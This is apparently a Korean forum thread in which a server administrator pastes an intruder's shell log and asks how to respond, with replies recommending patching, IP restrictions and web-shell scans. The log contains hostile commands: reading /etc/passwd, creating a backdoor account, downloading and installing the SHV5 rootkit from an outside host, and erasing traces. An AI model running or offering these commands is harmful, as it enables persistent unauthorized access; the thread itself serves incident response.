인도네시아 해커?

6개월 전에 서버에 로그를 남긴 아래 일부 내용을 보면 systemic 계정이 만들어졌었구요.
그때 systemic계정을 삭제햇던 것으로 기억합니다만, 오늘 확인해보니, 이틀 전에 다시 systemic계정으로 로그인했네요.
IP 추척을 해보니, 인도네시아 어느 동네.

혹시 유사한 해킹 사례를 알고 계시나요? 유효한 대처방안은 무엇일까요?

cd /tmp
rm -fr sploit2009

cat /etc/passwd
adduser systemic
cat /etc/passwd
passwd systemic
pwd
lwp-download http://root-ko.do.am/door/shv5.tar.gz
tar -zxvf shv5.tar.gz;rm -fr shv5.tar.gz
cd shv5
./setup propeller3299 2424
w
ls -al
cd /tmp
rm -fr 5bea6cd1e921e2210cc80652b sess*
ls -al
rm -fr 5bea6cd1e921e2210cc80652b80aa40f.cgi
w
exit

아주 오래된 redhat version 자체가 문제이지요 ㅠㅠ

일단 외부접속 IP대역에 제한을 거시는 게 어떨가요?

root로 들어와서 루트킷을 깔 정도면 일단 취약점을 최대한 빨리 패치해야 되는데

버전이 오래되서 안 된다면 일단 외부에서 접근 자체를 차단하는 게 낫지 않을까요

그리고 웹 폴더 쪽에 웹쉘이 있는지도 툴을 사용해서 체크 해 보시는게 좋을 듯 싶습니다.

감사합니다. 일단 툴을 사용해서, 문제가 된 부분이 있는 것을 확인했지만, 버전이 워낙 낮아서, 통째로 새로 설치할 상황이지만. 마음처럼 쉽게 할 수 없는 상황 잘 아실 것입니다.

제가 관리하는 서버가 좀 말도 안되는 상황이라서 외부에서 접근을 차단하는 것은 어려운 상태이구요. 그나마 줄이고 줄여서, 가상 호스팅을 20 곳으로 돌리고 있습니다. 리눅스 정말 대단합니다. 한 때는 전 세계 지부를 몽땅 그렇게 가상 호스팅으로 맹글어서, 아주 저렴하게 웹서비스를 했으니. 문제는 게시판을 사용하는 사용자들을 관리할 수 없는 제로보드 같은 프로그램이구요. 저 같이 갑자기 전임자로부터 자세한 내용을 넘겨 받지도 못하고, 늘 일이 터지면서 배우고 있습니다. 다행히 돈 될만한 내용이 있지 않아서…

SHV5 가 뭔가 해서 구글링을 해 보니 루트킷의 한 종류인가 보군요…
정말 골치아프시겠어요.

kldp.org에서 예전에 재미있는 글타래를 본 적이 있는데…
학교의 자기 개인 서버에 어떤 외국 크래커가 SucKIT 이라는 루트킷을 감염시켜 놓고 놀고 있는 걸 보고서는
자기 디렉토리 안에 메모 파일 하나를 남겨놨답니다.
"필요하면 그냥 Root 계정 줄 테니, 제발 시스템 파괴하지만 말아달라"
한마디로 항복선언하고 자비를 구걸(?)한 건데
의외로 쿨하게 그 외국인 크래커가 그 메모를 보고 시스템을 건드리지는 않더랍니다.
나중에 그 크래커랑 연락처도 교환하고 MSN으로 채팅도 하고 그럴 정도로 친해졌다는…
훈훈한… ㅠㅠ